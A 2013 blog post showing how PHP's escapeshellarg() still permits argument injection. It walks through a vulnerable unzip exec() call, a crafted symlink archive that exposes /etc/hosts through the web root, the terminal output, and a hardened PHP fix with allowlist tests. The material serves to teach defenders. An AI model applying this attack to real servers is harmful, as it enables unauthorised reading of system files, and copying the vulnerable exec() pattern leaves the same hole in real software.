Sunday, March 24, 2013

Breaking escapeshellarg() news

The PHP function escapeshellarg() is the most popular way to prevent OS command injection in shell calls: it escapes each command argument.

But this function is not a panacea, and you should keep that in mind when using it.

Let's look at what this escaping function actually does:
  1. Wraps the string in single quotes: aaa -> 'aaa'
  2. Cuts bytes 0x00, 0x80-0xFF
  3. Escapes single quotes: ' -> ''\'''
This guarantees that the string becomes exactly one command-line argument.
So it looks like the ideal solution, right?

But there is no restriction on which characters that argument may contain. For example, an argument that has passed through escapeshellarg() can still be an option (-a, -o and others). This is the first trick.

The second trick is the argument parser embedded in command-line utilities.

Compare:
$command -arg param
$command -arg=param
$command '-arg=param'
$command '-arg param'

For most command-line utilities there is no difference between these four invocations! Pay attention to the last two lines: those are exactly the values you can pass through escapeshellarg() filtering.

   exec('unzip -j '.escapeshellarg($_GET['zip_arch_name']).' *.dat -d /tmp');
Is this code protected from attackers? Check it in a terminal by typing:
$ unzip -j '-d/var/www/' *.dat -d /tmp

This command extracts the files matching the patterns '*.dat' (every match after the first), '-d' and '/tmp' from the ZIP archive named *.dat (the first match) into the output folder /var/www.

Preparing the exploit:
$ ln -s /etc/hosts 2.dat
$ zip --symlinks 1.zip 2.dat
$ mv 1.zip 1.dat

You can also add a file named '-d' to the archive to make the attack more reliable (no need to upload both 1.dat and 2.dat for the exploit).

Try it:

$ unzip -j '-d/var/www' *.dat -d /tmp
Archive:  1.dat
    linking: /var/www/2.dat  -> /etc/hosts
finishing deferred symbolic links:
  /var/www/2.dat -> /etc/hosts
caution: filename not matched:  -d
caution: filename not matched:  /tmp

Now you can read the files via +FollowSymlinks.
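The fix for the exec() line above is not a better escaping function but a guarantee that the user-controlled value can never be parsed as an option. The following is an added example, not code from the original post; $uploadDir, safeArchivePath() and buildUnzipCommand() are assumed names.

```php
<?php
// Added example: hardening the unzip call so that a user-supplied archive
// name is always an operand, never an option like '-d/var/www'.

function safeArchivePath(string $uploadDir, string $userName): string
{
    // Keep only the last path component: no directory traversal.
    $base = basename($userName);

    // Strict allowlist: letters, digits, dot, underscore, hyphen and the
    // expected extension. The first character may not be '-', which is
    // exactly what escapeshellarg() alone does not prevent.
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]*\.dat$/', $base)) {
        throw new InvalidArgumentException("rejected archive name: $userName");
    }

    // Anchoring the value to a fixed directory is a second, independent
    // guard: an argument that starts with '/' can never look like an option.
    return $uploadDir . '/' . $base;
}

function buildUnzipCommand(string $uploadDir, string $userName, string $outDir): string
{
    $archive = safeArchivePath($uploadDir, $userName);
    // escapeshellarg() still does its job (one argument per value, quotes
    // handled); the option-versus-operand problem was solved above.
    // '*.dat' is quoted so that unzip, not the shell, matches it against
    // the archive members.
    return 'unzip -j ' . escapeshellarg($archive)
         . ' ' . escapeshellarg('*.dat')
         . ' -d ' . escapeshellarg($outDir);
}

// Constructed inputs: one legitimate name and three that must be rejected.
$cases = ['report.dat', '-d/var/www', '../../etc/passwd', 'a b.dat'];
foreach ($cases as $name) {
    try {
        echo buildUnzipCommand('/srv/uploads', $name, '/tmp/extract'), "\n";
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), "\n";
    }
}
```

This closes the argument-injection hole only; extracting attacker-controlled symlinks into a web-served directory is a separate issue that the archive name check does not address.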

7 comments:

  1. A little bit clearer, please?
    So you can inject '-d/var/www/', which will be treated as an argument and create an archive in /var/www.... what's the deal with the symlinks?

    1. Mmm... I can't understand your question...
      "Now you can read files by +FollowSymlinks"
